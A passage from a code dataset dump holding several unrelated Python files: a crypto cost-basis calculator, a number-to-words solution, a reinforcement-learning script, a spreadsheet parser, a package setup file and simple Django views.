0\r\n passNum += 1\r\n if passNum == 1:\r\n c2 = c1\r\n d2 = d1\r\n if passNum > 1:\t\t\r\n c3 = c1\t\t\t\r\n d3 = d1\r\n A = int(c2)\t\t\t\t\r\n B = int(c3)\t\t\r\n if (A > B):\r\n Temp = Temp + c2 + d2\r\n c2 = c3\r\n d2 = d3\r\n lastflag=1\r\n if (A < B):\r\n Temp = Temp + c3 + d3\r\n sortflag = 1\t\t\t\t\t\r\n lastflag=2\r\n \t\t\t\r\n d1 = \"\"\r\n c1 = \"\"\t\t\t\r\n continue\t\t \r\n if a1 == ',':\r\n cnt = cnt + 1\r\n if cnt == 0:\r\n c1 = c1 + a1\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n if lastflag == 1:\r\n Temp = Temp + c3 + d3 \t\r\n if lastflag == 2:\r\n Temp = Temp + c2 + d2\t\t\r\n Sell = Temp \t\r\n\r\n# filter out the index numbers before writing the new work file\r\n with open('work.tmp','a') as f2:\r\n Temp = \"\"\r\n for c in range(len(Sell)):\r\n a1 = Sell[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n Temp = Temp + d1\r\n d1 = \"\"\r\n cnt = 0\r\n if ((a1 == ',') 
and (cnt == 0)):\r\n cnt += 1\r\n continue\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n f2.write(Temp)\r\n\r\n\t\r\n\t\r\n\t\r\nprint(\"\\n\\nBasis-Profit Calculator\")\r\nprint(\"Ed Jordan, 14 Feb 2018\")\r\n\r\nsortFlag = \"\"\r\na = \"\"\r\na2 = \"\"\r\nb = len(sys.argv)\r\nif b > 1:\r\n for c in range(b): \r\n a2 = sys.argv[c]\r\n print(a2)\r\n if a2[0] != '-':\r\n a = a2\r\n\t\t\t\r\n if ((a2 == '-h') or (a2 == '--help') or (a2 == '-H')):\r\n print(\"Data should have one line of buys before the first sale. It can have a line of headers at the top.\")\r\n print(\"Data file needs 3 columns. These are separated by commas or tabs.\")\r\n print(\"Program uses last-in to first-out, LIFO, basis accounting\\n\")\r\n print(\"Data should be in chronological order with buys first before sales.\")\r\n print(\"An 'index out of range' error probably is related to the data file format. \")\r\n print(\"Parameters:\\n -h or --help: help\\n first parameter: datafile name\\nFirstIn-FirstOut: -F\")\r\n print(\"python B2018.py datafile.txt -F\")\r\n print(\"See the README file.\")\r\n sys.exit(1)\r\n\r\n if ((a2 == '-F') or (a2 == '-f')):\r\n sortFlag = \"F\"\r\n\t\t\t\r\nif a != '': \r\n dfile = ''\r\n for s in range(0,len(a)):\r\n if a[s] == '.':\r\n break\r\n dfile = dfile + a[s]\r\n\r\n datafile = dfile + '.txt'\r\n writefile = dfile + '.csv'\r\n print(datafile)\r\n\r\nwith open(datafile,'r') as f1:\r\n with open('work.tmp','w') as f2:\r\n for line in f1:\r\n msg = \"\"\r\n flag = 0\r\n for s in range(0,len(line)):\r\n a = line[s]\r\n if line[0] == '\\n':\r\n break \r\n if a == chr(9):\r\n a = ','\r\n msg = msg + a\r\n elif ((a == ',') and (flag == 1)):\r\n continue\r\n elif a == '$':\r\n flag = 1\r\n continue\r\n elif ((a == ',') and (flag == 1)):\r\n continue\r\n elif a == ' ':\r\n continue\r\n else:\r\n msg = msg + a\r\n \r\n f2.write(msg) \r\n f2.close\r\n\r\n\t\r\nif sortFlag == 'F':\r\n print(\"Option -F\")\r\n SortData() \r\n\r\n\r\n\t\r\ndef GetDecimal(n3): # each piece of data should have the correct number of decimals\r\n cnt = 0\r\n for s in range(0,len(n3)):\r\n a = n3[s]\r\n cnt = cnt + 1\r\n if a == '.':\r\n cnt = 0\r\n \r\n return cnt\r\n\t\r\n\t\r\ndef AdjFlag(n1,n2,Prec):\r\n flag=0\t\t\r\n \r\n# 3 outcomes for addition of sold coins with bought coins\r\n# negative - more sold than bought\r\n# positive - fewer sold than bought\r\n# zero - equal number sold and bought $flag 0, 1, or 2\r\n\r\n a = \"0.\"\r\n for s in range(0,Prec):\r\n a = a + \"0\"\r\n\t\t\r\n a = a + \"5\"\r\n a = Decimal(a)\t\r\n pr1 = float(n1)\r\n pr2 = float(n2) \r\n\t\r\n if pr1 < a: # decimal point + 1 ?\r\n pr1 = 0\r\n if pr2 < a:\r\n pr2 = 0\r\n \r\n pr3 = pr1 - pr2\r\n\r\n if pr3 == 0:\r\n flag = 0\r\n if pr3 > 0:\r\n flag = 2\r\n if pr3 < 0:\r\n flag = 1\r\n\r\n# if the flag is zero. 
The amounts of the coins are equal\r\n# the price of the bought coins == the basis of the sold coins\r\n# both the bought coin row and the sold coin row can be deleted\r\n# from the data file\r\n\r\n return flag\r\n\r\ndef findRecordIndex():\r\n inx = 1\t\t\t\t\t# starting record\r\n try:\r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n cnt = 0\r\n for line in reader:\r\n cnt=cnt+1\r\n n1 = line[1]\r\n if n1[0] == '-':\r\n inx = cnt\r\n break\r\n f1.close\r\n inx = inx -1\r\n except IndexError:\r\n inx = 0\r\n return inx\r\n\r\ndef findListA(inx):\r\n dataLista = \"\"\r\n f1 = open('work.tmp', 'r')\r\n cnt = 1\r\n c1 = \"\"\r\n for line in f1: \r\n c1 = c1 + str(line) \r\n cnt = cnt + 1 \r\n if cnt == inx:\r\n f1.close\r\n break\r\n \r\n dataLista = c1\r\n return dataLista\r\n\r\ndef findListB(inx):\r\n dataListb =\"\"\r\n inx = inx +2\r\n f1 = open('work.tmp', 'r')\r\n cnt = 0\r\n c1 = \"\"\r\n for line in f1:\r\n cnt = cnt +1 \r\n if cnt >= inx:\r\n c1 = c1 + str(line) \r\n \r\n f1.close\r\n dataListb = c1\r\n return dataListb\r\n\r\ndef saveData(html):\r\n csv.register_dialect('escaped', delimiter = ' ', escapechar=\"\\\\\", quoting=csv.QUOTE_NONE)\r\n with open(writefile, 'a', newline='') as f1:\r\n linewriter = csv.writer(f1, dialect='escaped')\r\n linewriter.writerow(html)\r\n f1.close\r\n return\r\n\r\ndef writeData(dataLista, html, dataListb):\r\n f1 = open('work.tmp','w')\r\n f1.write(dataLista)\r\n f1.write(html)\r\n f1.write(dataListb)\r\n f1.close\r\n return\r\n\r\ndef makePositive(x): # string x is returned positive\r\n c = x\r\n a = \"\"\r\n for b in range(len(c)):\r\n if c[b] != '-':\r\n a = a + c[b]\r\n return a\r\n\r\ndef adjLength(x,y): # limit string to 2 decimal digits for currency.\r\n # y is the number of digits after the decimal point\r\n cnt=0\r\n a = \"\"\r\n e = \"\"\r\n c = \"\"\r\n d = 0\r\n flag = 0 # flag for the decimal point\r\n flag2 = 0 # flag for a leading zero in e\r\n for b in range(len(x)):\r\n f = x[b]\r\n if flag == 1:\r\n cnt = cnt + 1\r\n if cnt > y:\r\n d = int(f)\r\n break\r\n e = e+f\r\n if f == '.':\r\n flag = 1\r\n if flag == 0:\r\n c = c + f\r\n\t\t\t\t\t\r\n if d > 4: \r\n flag=0\r\n cnt = 0\r\n\r\n for b in range(len(e)):\r\n if e[b] != \"0\":\r\n flag = 1\r\n if e[b] == \"0\":\r\n if flag == 0:\r\n flag2 = flag2+1 # count leading zeros\r\n else:\r\n cnt = cnt+1 # digits after leading 0\r\n\r\n# int drops all leading zeros\r\n# if e is all 9s - they become zeros and c is incremented\r\n# if e is all 0s - it becomes 1 and we drop one leading 0\r\n# if e after the leading zeros is all 9s we also drop 1 0\r\n\r\n pr = \"\"\r\n pr1= \"\"\r\n if cnt > 0:\r\n for b in range(cnt):\r\n pr = pr + \"9\"\r\n pr1 = pr1 + \"0\"\r\n \r\n pr = int(pr)\r\n e = int(e)\r\n \r\n if e == pr:\r\n if cnt < y:\r\n e = \"1\"+pr1\r\n flag2 = flag2 -1\r\n if cnt == y:\r\n e = pr1\r\n c = int(c)\r\n c = c + 1\r\n c = str(c)\r\n else:\r\n e = e + 1\r\n e = str(e)\r\n for b in range(flag2):\r\n e = '0'+e\r\n\r\n if cnt == 0:\r\n e = 1\r\n flag2 = flag2-1\r\n e = str(e)\r\n if flag2 > 0: # add leading zeros\r\n e = str(e)\r\n for b in range(flag2):\r\n e = \"0\"+e\r\n\r\n a = c +\".\"+e \r\n n = y - len(e)\r\n\t\r\n if n > 0:\r\n for b in range(n):\r\n a = a + \"0\"\t\t# add trailing zeros\r\n \r\n return a \r\n \r\ndef adjValue(x): # adj value of digital x and make string\r\n if x == 0:\r\n a = \"0.00\"\r\n else:\r\n a = str(x) \r\n\r\n return a \r\n\r\n# Save work.tmp first to the spreadsheet. 
This followed by the program output\t\r\nmsg = \"\"\r\nsaveData(msg)\r\n\r\nwith open('work.tmp','r') as f1:\r\n for line in f1:\r\n msg = ''\r\n for a in range(0,len(line)):\r\n if line[a] != '\\n':\r\n msg = msg + line[a]\r\n\r\n saveData(msg) \r\n\t\r\n# write first row of the spreadsheet\r\nmsg = \"\"\r\nsaveData(msg)\r\nmsg = \"saleDate,number,cost,unitPrice,proceeds,buyDate,profit,gain\"\r\nsaveData(msg)\r\n\r\n# d1 is the date of the purchase\r\n# d2 is the date of the sale\r\n# gain is the long or short term nature of the sale\r\n# p1 is the price of the purchased coins\r\n# p2 is the price of the sale of coins and it is negative\r\n# p3 is the price per coin in dollars purchased\r\n# p4 is the price per coin in dollars sold\r\n# n1 is the number of coins bought\r\n# n2 is the number of coins sold.\r\n\r\n\r\ninx = 1\r\nwhile inx > 0:\r\n \r\n d1=\"\"\r\n d2=\"\"\r\n n1=\"\"\r\n n2=\"\"\r\n p1=\"\"\r\n p2=\"\"\r\n p3=\"\"\r\n p4=\"\"\r\n\r\n cnt2 = 0\r\n flag = 0\r\n dataListA = \"\"\r\n dataListB = \"\"\r\n\r\n inx = findRecordIndex() \r\n if inx < 1:\r\n break\r\n \r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n cnt=0\r\n \r\n for line in reader:\r\n cnt=cnt+1\r\n if cnt == inx:\r\n d1 = line[0]\r\n n1 = line[1]\r\n p1 = line[2]\r\n if cnt == inx+1:\r\n d2 = line[0]\r\n n2 = line[1]\r\n p2 = line[2]\r\n break\r\n f1.close\r\n\t\t\r\n Precision = GetDecimal(n1) # set decimal number based on data \r\n p1 = makePositive(p1)\r\n p2 = makePositive(p2) \r\n n1 = makePositive(n1)\r\n n2 = makePositive(n2)\r\n\t\r\n yr1 = d1[0]+d1[1]+d1[2]+d1[3] \r\n yr2 = d2[0]+d2[1]+d2[2]+d2[3] \r\n if d1[4] == 0:\r\n mo1 = d1[5] \r\n else:\r\n mo1 = d1[4] + d1[5]\r\n if d1[6] == 0:\r\n da1 = d1[7]\r\n else:\r\n da1 = d1[6] + d1[7] \r\n if d2[4] == 0:\r\n mo2 = d2[5] \r\n else:\r\n mo2 = d2[4] + d2[5]\r\n if d2[6] == 0:\r\n da2 = d2[7]\r\n else:\r\n da2 = d2[6] + d2[7]\r\n\r\n yr1 = int(yr1)\r\n mo1 = int(mo1)\r\n da1 = int(da1)\r\n yr2 = int(yr2)\r\n mo2 = int(mo2)\r\n da2 = int(da2) \r\n\r\n date1 = date(yr1,mo1,da1)\r\n date2 = date(yr2,mo2,da2)\r\n date3 = abs(date2-date1)\r\n date3 = date3.days\r\n if date3 > 365:\r\n gain = \"L\"\r\n else:\r\n gain = \"S\"\r\n\r\n# the basis for the sale is the share of the coins purchased\r\n# is #sold/#bought x price of the whole purchase\t\r\n \r\n p1 = Decimal(p1) # cost of purchase\r\n p2 = Decimal(p2) # proceeds of sale \r\n n2 = Decimal(n2) # number sold\r\n n1 = Decimal(n1) # number bought\r\n p3 = Decimal(p1/n1) # price per coin bought\r\n p4 = Decimal(p2/n2) # price per coin sold\r\n p4 = float(p4)\r\n p4 = Decimal(p4)\r\n p3 = float(p3)\r\n p3 = Decimal(p3)\r\n\t\r\n basis = p3*n2 \r\n profit = p2 - basis\r\n\t\r\n basis = adjValue(basis)\r\n basis = adjLength(basis,2)\r\n basis = Decimal(basis)\r\n profit = adjValue(profit)\r\n profit = adjLength(profit,2)\r\n profit = Decimal(profit)\r\n\t\t\r\n\t\t\r\n# the price obtained for the coins sold minus the basis = gain/loss p2 = proceeds of sale\r\n# remaining coins unsold are n1 - n2 \r\n# the price per coin purchased does not change. 
p3 and p4 don't change\r\n\r\n profit = adjValue(profit)\r\n profit = adjLength(profit,2)\r\n newNumCoins = n1-n2\r\n newBasis = newNumCoins*p3\r\n newBasis = adjValue(newBasis)\r\n newNumCoins = str(newNumCoins)\r\n basis = adjValue(basis)\r\n\r\n newBasis = adjLength(newBasis,2)\r\n\r\n profit = adjLength(profit,2)\r\n newNumCoins = adjLength(newNumCoins,Precision)\r\n \r\n flag = AdjFlag(n1,n2, Precision)\r\n \r\n dataListA = findListA(inx)\r\n dataListB = findListB(inx)\r\n\r\n if flag == 0: # equal number sold and bought\r\n n2 = str(n2)\r\n p3 = adjValue(p3)\r\n p3 = adjLength(p3,2)\r\n n2 = adjLength(n2,Precision)\r\n p1 = adjValue(p1)\r\n p2 = adjValue(p2)\r\n p1 = adjLength(p1,2)\r\n p2 = adjLength(p2,2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n msg = d2+\",-\"+n2+\",\"+basis+\",\"\r\n msg = msg+p4+\",\"+p2+\",\"+d1+\",\"+profit+\",\"+gain\r\n\t\r\n saveData(msg)\r\n msg = '\\n'\r\n writeData(dataListA,msg,dataListB)\r\n\r\n if flag == 2: # fewer number sold than bought\r\n n2 = str(n2)\r\n profit = str(profit)\r\n n2 = adjLength(n2,Precision)\r\n p2 = adjValue(p2)\r\n p2 = adjLength(p2,2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n msg = d2+\",-\"+n2+\",\"+basis+\",\"+p4+\",\"+p2+\",\"+d1+\",\"+profit+\",\"+gain\r\n\t\t\r\n saveData(msg)\r\n msg = d1+','+newNumCoins+','+newBasis+'\\n'\r\n\r\n writeData(dataListA,msg,dataListB)\r\n \r\n if flag == 1: # greater number sold than bought - carry some over unsold coins to the next sale\r\n # n1 becomes the number sold and the proceeds are n1*p4 for sale proceeds\r\n\t\t # p1 is the basis of the sold coins \r\n \r\n nn1 = n2 - n1\r\n newBasis = nn1*p4\r\n np2 = n1*p4\r\n nn1 = str(nn1)\r\n nn1 = makePositive(nn1)\r\n nn1 = adjLength(nn1,Precision)\r\n profit = np2-p1 \r\n np2 = adjValue(np2)\r\n np2 = adjLength(np2,2)\r\n p1 = adjValue(p1)\r\n p1 = adjLength(p1,2)\r\n n1 = str(n1) \r\n n1 = adjLength(n1,Precision) \r\n p2 = str(p2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n profit=adjValue(profit)\r\n profit=adjLength(profit,2)\r\n newBasis = adjValue(newBasis)\r\n newBasis=adjLength(newBasis,2)\r\n msg = d2+\",-\"+n1+\",\"+p1+\",\"+p4+\",\"+np2+\",\"+d1+\",\"\r\n msg = msg +profit+\",\"+gain \r\n saveData(msg)\r\n \r\n msg = d2+',-'+nn1+',-'+newBasis+'\\n'\r\n writeData(dataListA,msg,dataListB)\r\n\t\t\r\n\r\n\t\t\r\n# add the work.tmp residual file to the spreadsheet\r\n# then delete the work.tmp file\r\nmsg = \"\"\r\nsaveData(msg)\r\nmsg = 'Residual,Unsold,Items'\r\nsaveData(msg)\r\n\r\nwith open('work.tmp','r') as f1:\r\n for line in f1:\r\n msg = ''\r\n for a in range(0,len(line)):\r\n if line[a] != '\\n':\r\n msg = msg + line[a]\r\n\r\n saveData(msg) \r\n \r\n\t\t\r\nos.remove('work.tmp')\r\n\r\nprint('done')\r\nsys.exit(0)\r\n","sub_path":"B2019b.py","file_name":"B2019b.py","file_ext":"py","file_size_in_byte":19054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
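The comments in B2019b.py describe the basis arithmetic in prose; worked through on a made-up pair of trades it looks like this:

from decimal import Decimal

p1, n1 = Decimal("205"), Decimal("0.05")  # cost and size of the buy
p2, n2 = Decimal("120"), Decimal("0.02")  # proceeds and size of the sale
p3 = p1 / n1         # price per coin bought
basis = p3 * n2      # basis of the coins sold
profit = p2 - basis  # reportable gain
print(p3, basis, profit)  # 4100 82.00 38.00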
+{"seq_id":"370501147","text":"\"\"\"\n1305. Integer to English Words\nConvert a non-negative integer to its English words representation. Given input is guaranteed to be less than 2^31 - 1.\n\nExamples\n123 -> \"One Hundred Twenty Three\"\n12345 -> \"Twelve Thousand Three Hundred Forty Five\"\n1234567 -> \"One Million Two Hundred Thirty Four Thousand Five Hundred Sixty Seven\"\n\"\"\"\nclass Solution:\n    \"\"\"\n    @param num: a non-negative integer\n    @return: English words representation\n    \"\"\"\n    def numberToWords(self, num):\n        # Write your code here\n        n1 = [\"\", \"One\", \"Two\", \"Three\", \"Four\", \"Five\",\n              \"Six\", \"Seven\", \"Eight\", \"Nine\", \"Ten\",\n              \"Eleven\", \"Twelve\", \"Thirteen\", \"Fourteen\", \"Fifteen\",\n              \"Sixteen\", \"Seventeen\", \"Eighteen\", \"Nineteen\"]\n        n2 = [\"\", \"Ten\", \"Twenty\", \"Thirty\", \"Forty\",\n              \"Fifty\", \"Sixty\", \"Seventy\", \"Eighty\", \"Ninety\"]\n        n3 = ['Hundred', '', 'Thousand', 'Million', 'Billion']\n        if num == 0:\n            return 'Zero'\n\n        def chunk_words(digit):\n            # Spell out one three-digit group, 0 < digit < 1000.\n            r = ''\n            if digit >= 100:\n                r += n1[digit // 100] + ' ' + n3[0]\n                digit %= 100\n            if digit >= 20:\n                r += ' ' + n2[digit // 10]\n                digit %= 10\n            if digit:\n                r += ' ' + n1[digit]\n            return r.strip()\n\n        res = ''\n        index = 1  # n3 scale of the current group: '', Thousand, Million, ...\n        while num:\n            digit = num % 1000\n            num //= 1000\n            if digit:\n                part = chunk_words(digit)\n                if index > 1:\n                    part += ' ' + n3[index]\n                res = part + ' ' + res\n            index += 1\n        return res.strip()\n","sub_path":"算法 - 其他/字符串处理/1305.Integer to English Words.py","file_name":"1305.Integer to English Words.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
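The docstring's samples, run through the converter above, plus a two-digit case:

s = Solution()
print(s.numberToWords(123))      # One Hundred Twenty Three
print(s.numberToWords(12345))    # Twelve Thousand Three Hundred Forty Five
print(s.numberToWords(1234567))  # One Million Two Hundred Thirty Four Thousand Five Hundred Sixty Seven
print(s.numberToWords(45))       # Forty Five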
+{"seq_id":"122304325","text":"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport mountain_car_q_learning\nfrom mountain_car_q_learning import plot_cost_to_go, StateTransformer, RBFLearnModel, plot_running_avg\n\n\n# the main difference with a basic Q-learning that we calculate G for a multiple steps\nclass SGDRegressor:\n def __init__(self, **kwargs):\n self.weights = None\n self.learning_rate = 0.01\n\n # keep in mind that Y is G\n def partial_fit(self, X, Y):\n if self.weights is None:\n dimensions = X.shape[1]\n self.weights = np.random.randn(dimensions) / np.sqrt(dimensions)\n self.weights += self.learning_rate * (Y - X.dot(self.weights)).dot(X)\n\n def predict(self, X):\n return X.dot(self.weights)\n\nmountain_car_q_learning.SGDRegressor = SGDRegressor\n\n# we have to keep N states, rewards and actions\ndef play_one(env, model, eps, gamma, n=5):\n state = env.reset()\n done = False\n total_reward = 0\n rewards = []\n states = []\n actions = []\n # for each step we have to multiply by additional gamma\n n_gammas = np.array([gamma]*n) ** np.arange(n)\n\n while not done:\n action = model.next_action(state, eps)\n\n states.append(state)\n actions.append(action)\n\n prev_state = state\n state, reward, done, info = env.step(action)\n\n rewards.append(reward)\n\n # update model\n if len(rewards) >= n:\n previous_returns = n_gammas.dot(rewards[-n:])\n G = previous_returns + (gamma **n)*np.max(model.predict(state)[0])\n model.update(states[-n], actions[-n], G)\n\n total_reward += reward\n\n rewards = rewards[-n+1:]\n states = states[-n+1:]\n actions = actions[-n+1:]\n\n # according to documentation goal achived if position > 0.5\n win = state[0] >= 0.5\n if win:\n while len(rewards) > 0:\n G = n_gammas[:len(rewards)].dot(rewards)\n model.update(states[0], actions[0], G)\n states.pop(0)\n actions.pop(0)\n rewards.pop(0)\n else:\n # we lose, so it is a good idea to set negative reward\n while len(rewards) > 0:\n guess_rewards = rewards + [-1]*(n - len(rewards))\n G = n_gammas.dot(guess_rewards)\n model.update(states[0], actions[0], G)\n states.pop(0)\n actions.pop(0)\n rewards.pop(0)\n return total_reward\n\nif __name__ == '__main__':\n env = gym.make('MountainCar-v0')\n state_transformer = StateTransformer(env)\n model = RBFLearnModel(env, state_transformer, \"constant\")\n gamma = 0.99\n\n N_episodes = 300\n total_rewards = np.empty(N_episodes)\n for episode in range(N_episodes):\n eps = 0.1 * (0.97 ** episode)\n one_episode_reward = play_one(env, model, eps, gamma)\n total_rewards[episode] = one_episode_reward\n if (episode + 1) % 100 == 0:\n print(\"episode:\", episode, \"total reward:\", total_rewards)\n\n plt.plot(total_rewards)\n plt.title(\"Rewards\")\n plt.show()\n\n plot_running_avg(total_rewards)\n plot_cost_to_go(env, model)\n\n\n\n","sub_path":"olena_reinforsment_learning/n_step.py","file_name":"n_step.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
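The heart of the method above is the n-step return G = r_t + gamma*r_{t+1} + ... + gamma**(n-1)*r_{t+n-1} + gamma**n * max_a Q(s_{t+n}, a). A tiny standalone check of the discounted-sum part, using the same n_gammas construction as play_one:

import numpy as np

gamma, n = 0.99, 5
n_gammas = np.array([gamma] * n) ** np.arange(n)  # [1, g, g^2, g^3, g^4]
rewards = [-1.0] * n                              # MountainCar pays -1 per step
print(round(float(n_gammas.dot(rewards)), 4))     # -4.901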
+{"seq_id":"404363","text":"\"\"\"\n\"\"\"\n\nfrom gluegov.lib.tables import XLSTable\nimport xlrd\n\ndef format(x):\n try:\n return str(int(x))\n except:\n return str(x)\n\ndef isNotEmpty(x):\n return x != \"\" and x != \" \"\n\nclass onsXLSTable(XLSTable):\n def parse(self):\n # open file and get the correct sheet\n b = xlrd.open_workbook(self.fileName)\n s = b.sheet_by_index(1)\n\n # get keys\n keylist1 = s.row_values(9)\n keylist2 = s.row_values(10)\n\n # map keylists to one keylist\n keylist = [e for e in map(lambda x, y: x+\" \"+format(y), keylist1, keylist2)]\n keylist = [e for e in filter(lambda x: isNotEmpty(x), keylist)]\n self.fields = keylist\n\n for x in range(13, 463):\n row = s.row_values(x)\n row = [e for e in filter(lambda x: isNotEmpty(x), row)]\n if row != []:\n rowDict = dict(zip(keylist, row))\n self.records.append(rowDict)\n\n\nonsXLSTable(\n \"ons\",\n \"population-and-household-estimates\",\n \"http://www.ons.gov.uk/ons/rel/census/2011-census/population-and-household-estimates-for-england-and-wales---unrounded-figures-for-the-data-published-16-july-2012/rft-1-2-ew-pp04.xls\",\n \"population-and-household-estimates.xls\"\n).parse()\n","sub_path":"server/gluegov/data/ons.py","file_name":"ons.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"293922700","text":"def countdown(number):\n if number >= 0:\n print(number)\n countdown(number - 1)\n\ndef countup(curr, max):\n if curr <= max:\n print(curr)\n countup(curr + 1, max)\n\ndef sil(n):\n if n == 1:\n return 1\n else:\n return n * sil(n - 1)\n\n\n#countdown(10)\n#countup(1, 2)\nnumb = 3\nprint(f\"{numb}! = {sil(numb)}\")","sub_path":"Rekurencja.py","file_name":"Rekurencja.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"533057326","text":"import re\nimport sys\nfrom os import path\nfrom setuptools import find_packages, setup\nfrom setuptools.command.test import test as TestCommand\n\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'PACKAGE_README.md')) as f:\n long_description = f.read()\n\n\nclass PyTest(TestCommand):\n user_options = [('pytest-args=', 'a', \"Arguments to pass to pytest\")]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = ''\n\n def run_tests(self):\n import shlex\n # import here, cause outside the eggs aren't loaded\n import pytest\n errno = pytest.main(shlex.split(self.pytest_args))\n sys.exit(errno)\n\n\ntests_require = [\n 'pandas',\n 'pytest',\n 'requests_mock',\n 'mock', # needed for Python 2\n 'future', # needed for Python 2\n 'pylint',\n 'pylint2junit'\n]\n\nrelease_require = [\n 'zest.releaser[recommended]>=6.13.5,<6.14',\n 'readme-renderer>=24.0,<25.0',\n 'setuptools >= 38.6.0',\n 'wheel >= 0.31.0',\n 'twine >= 1.11.0',\n]\n\ndev_require = tests_require + [\n 'ipython',\n 'sphinx==1.8.3',\n 'sphinx_rtd_theme==0.1.9',\n 'nbsphinx>=0.2.9,<1',\n 'nbconvert>=5.3,<6',\n 'numpydoc>=0.8.0',\n]\n\n\nwith open('datarobotai/_version.py') as fd:\n version = re.search(r'^__version__\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]',\n fd.read(), re.MULTILINE).group(1)\n\nif not version:\n raise RuntimeError('Cannot find version information')\n\n\nsetup(name='datarobot-ai',\n version=version,\n description='Python Client for the DataRobot AI API',\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n url='https://github.com/datarobot/datarobot-ai-py',\n author='DataRobot, Inc',\n author_email='support@datarobot.com',\n license='Apache 2.0',\n packages=find_packages(),\n install_requires=[\n 'requests', 'requests_toolbelt', 'six', 'backports.csv'\n ],\n tests_require=tests_require,\n extras_require={\n 'dev': dev_require,\n 'release': release_require,\n 'recommended': ['pandas==0.24.2'],\n },\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Natural Language :: English',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n cmdclass={'test': PyTest},\n include_package_data=True,\n zip_safe=False)\n","sub_path":"pypi_install_script/datarobot-ai-1.0.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"370861894","text":"# header\nheader = {'Content-Type\t':'application/x-www-form-urlencoded'}\n# 文字识别api地址\ngeneral_url = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic'\n# 语种字典\nlanguage_dict = {'中英混合':'CHN_ENG',\n '英文':'ENG',\n '葡萄牙语':'POR',\n '法语':'FRE',\n '德语':'GER',\n '意大利语':'ITA',\n '西班牙语':'SPA',\n '俄语':'RUS',\n '日语':'JAP',\n '韩语':'KOR'\n }\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"61264607","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView # Import TemplateView\nfrom django.views.generic import ListView\nfrom django.views.generic import DetailView\nfrom django.shortcuts import get_object_or_404\nfrom main.models import Employees\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.views import generic\n# Create your views here.\n#def home(request):\n# return HttpResponse(\"Hello World!\")\n\n#def home(request):\n# return render(request, \"main/home.html\", {'message': 'hi, sumit'})\n\ndef homepage(request):\n# employees=User.objects.all()\n employees = Employees.objects.all()\n# emp = employees.filter(user_id=\"sumitka\")\n return render(request, 'home.html', context={'employees':employees},\n )\n\nclass UserList(ListView):\n model = Employees\n template_name = 'home.html'\n# def get_context_data(self, **kwargs):\n# # Call the base implementation first to get a context\n# context = super(UserList, self).get_context_data(**kwargs)\n# # Get the blog from id and add it to the context\n# context['some_data'] = 'This is just some data'\n# return context\n\ndef index(request):\n homepage = Employees.objects.all()\n return render(request, 'index.html', {'homepage': homepage})\n\n# Add the two views we have been talking about all this time :)\n#class HomePageView(TemplateView):\n# template_name = \"home.html\"\n\n\n\nclass UserCreateView(generic.CreateView):\n from_class = UserCreationForm\n model = User\n template_name = 'createuser.html'\n# def __init__(self, arg):\n# super(UserCreateView, self).__init__()\n# self.arg = arg\n\n\nclass AboutPageView(TemplateView):\n template_name = \"about.html\"\n\n# Add this view\nclass DataPageView(TemplateView):\n def get(self, request, **kwargs):\n # we will pass this context object into the\n # template so that we can access the data\n # list in the template\n context = {\n 'data': [\n {\n 'name': 'Celeb 1',\n 'worth': '3567892'\n },\n {\n 'name': 'Celeb 2',\n 'worth': '23000000'\n },\n {\n 'name': 'Celeb 3',\n 'worth': '1000007'\n },\n {\n 'name': 'Celeb 4',\n 'worth': '456789'\n },\n {\n 'name': 'Celeb 5',\n 'worth': '7890000'\n },\n {\n 'name': 'Celeb 6',\n 'worth': '12000456'\n },\n {\n 'name': 'Celeb 7',\n 'worth': '896000'\n },\n {\n 'name': 'Celeb 8',\n 'worth': '670000'\n }\n ]\n }\n\n return render(request, 'data.html', context)\n","sub_path":"old_skillset/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
